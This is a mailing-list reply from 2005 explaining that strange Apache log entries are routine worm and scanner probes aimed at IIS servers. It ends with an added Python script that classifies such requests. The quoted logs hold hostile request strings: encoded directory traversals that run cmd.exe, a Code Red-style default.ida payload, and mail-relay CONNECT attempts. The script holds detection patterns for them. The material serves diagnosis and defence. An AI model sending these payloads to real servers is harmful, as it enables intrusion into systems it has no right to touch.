Re: "Strange" requests, Apache2
Hi, that is very common and happens every day; they are attack probes
against non-Apache servers.
Look at my logs from yesterday:
!!!! 18 possible successful probes
/d/winnt/system32/cmd.exe?/c+dir HTTP Response 302
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=6254&STRMVER=4&CAPREQ=0
HTTP Response 302
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=2614&STRMVER=4&CAPREQ=0
HTTP Response 302
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP Response
302
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%
1c../winnt/system32/cmd.exe?/c+dir HTTP Response 302
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP
Response 302
/_mem_bin/..%255c../..%255c../..%
255c../winnt/system32/cmd.exe?/c+dir HTTP Response 302
/scripts/root.exe?/c+dir HTTP Response 302
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP Response
302
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6254&STRMVER=4&CAPREQ=0
HTTP Response 302
/_vti_bin/..%255c../..%255c../..%
255c../winnt/system32/cmd.exe?/c+dir HTTP Response 302
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP Response
302
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP Response
302
/c/winnt/system32/cmd.exe?/c+dir HTTP Response 302
/MSADC/root.exe?/c+dir HTTP Response 302
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP Response
302
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP Response
302
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=2614&STRMVER=4&CAPREQ=0
HTTP Response 302
A total of 8 unidentified 'other' records logged
GET /////. HTTP/1.1 with response code(s) 1 200 responses
A%\xd0\xe0 with response code(s) 1 200 responses
- with response code(s) 1 408 responses
GET //. HTTP/1.1 with response code(s) 1 200 responses
GET ////. HTTP/1.1 with response code(s) 1 200 responses
GET /. HTTP/1.1 with response code(s) 1 200 responses
GET //////. HTTP/1.1 with response code(s) 1 200 responses
GET ///. HTTP/1.1 with response code(s) 1 200 responses
On Fri, 13-05-2005 at 09:31 +0200, gesala gesala wrote:
> Hi everyone:
> This morning, while looking at the apache logs, I found the
> following lines:
>
>
> 81.192.173.101 - - [13/May/2005:03:31:50 +0200] "GET
> /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
> HTTP/1.0" 404 317 "-" "-"
> 61.74.254.142 - - [13/May/2005:03:35:25 +0200] "CONNECT
> maila.microsoft.com:25 HTTP/1.0" 405 340 "-" "-"
> 61.74.254.142 - - [13/May/2005:03:35:26 +0200] "CONNECT
> maila.microsoft.com:25 HTTP/1.0" 405 340 "-" "-"
> 61.74.254.142 - - [13/May/2005:03:35:28 +0200] "CONNECT
> maila.microsoft.com:25 HTTP/1.0" 405 340 "-" "-"
> 81.22.194.62 - - [13/May/2005:04:29:00 +0200] "GET
> /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
> HTTP/1.0" 404 317 "-" "-"
>
> This has me really uneasy.
> It looks like for the 1st and last requests the apache server returns
> a 404 error. Am I wrong? And I can't make sense of the lines in the middle.
>
> Have I been hacked? I've looked at my machine's logs but it doesn't
> look like they did anything else.
>
> On another note, I have an ssh server and from time to time I see login
> attempts from a "strange" IP, which repeatedly tries to log in
> with English names; of course it doesn't get in, since
> my machine doesn't have those names. Is there some way to block
> for a while an IP that tries to log in and fails, for example, 3
> times?
> Or any other idea?
.''`. Luis Pérez Meliá
: :' :
`. `'`
`- Debian GNU/Linux
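
An added example, not part of the original messages: a small Python triage script for the kinds of request shown in this thread, which decodes repeated percent-encoding, names the probe type, and separates requests the server refused (4xx/5xx) from those that returned 2xx/3xx and deserve a look at what was served. The function names, category labels and sample lines are assumptions made for illustration; the sample lines are constructed, modelled on the thread's logs, with documentation-range addresses.

```python
import re
from urllib.parse import unquote

# Apache combined log format: host ident user [time] "METHOD target proto" status size
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+)[^"]*" (\d{3}) ')

def fully_decode(target, rounds=5):
    """Percent-decode repeatedly so that %255c -> %5c -> backslash."""
    for _ in range(rounds):
        decoded = unquote(target, encoding="latin-1")
        if decoded == target:
            break
        target = decoded
    return target

def classify(method, target):
    raw = target.lower()
    dec = fully_decode(raw)
    if method == "CONNECT":
        return "proxy relay attempt"
    if raw.startswith("/default.ida?"):
        return "IIS default.ida probe"
    if re.search(r"%c[01]%[0-9a-f]{2}", raw):
        return "overlong-encoded traversal"
    if re.search(r"\.\.[\\/]", dec):
        return "encoded traversal"
    if re.search(r"/(cmd|root)\.exe", dec):
        return "cmd.exe/root.exe probe"
    return None

def triage(line):
    m = LINE.match(line)
    kind = classify(m.group(2), m.group(3)) if m else None
    if kind is None:
        return None
    status = int(m.group(4))
    # 4xx/5xx: the server refused it. 2xx/3xx: check what was actually served.
    return m.group(1), kind, status, "rejected" if status >= 400 else "review"

# Constructed sample lines modelled on the thread (documentation-range addresses).
SAMPLE = [
    '192.0.2.10 - - [13/May/2005:03:31:50 +0200] "GET /default.ida?XXXX%u9090%u6858 HTTP/1.0" 404 317 "-" "-"',
    '192.0.2.20 - - [13/May/2005:03:35:25 +0200] "CONNECT maila.microsoft.com:25 HTTP/1.0" 405 340 "-" "-"',
    '192.0.2.30 - - [13/May/2005:05:00:00 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 290 "-" "-"',
    '192.0.2.40 - - [13/May/2005:05:01:00 +0200] "GET /index.html HTTP/1.1" 200 1024 "-" "-"',
]

if __name__ == "__main__":
    for entry in SAMPLE:
        print(triage(entry))
```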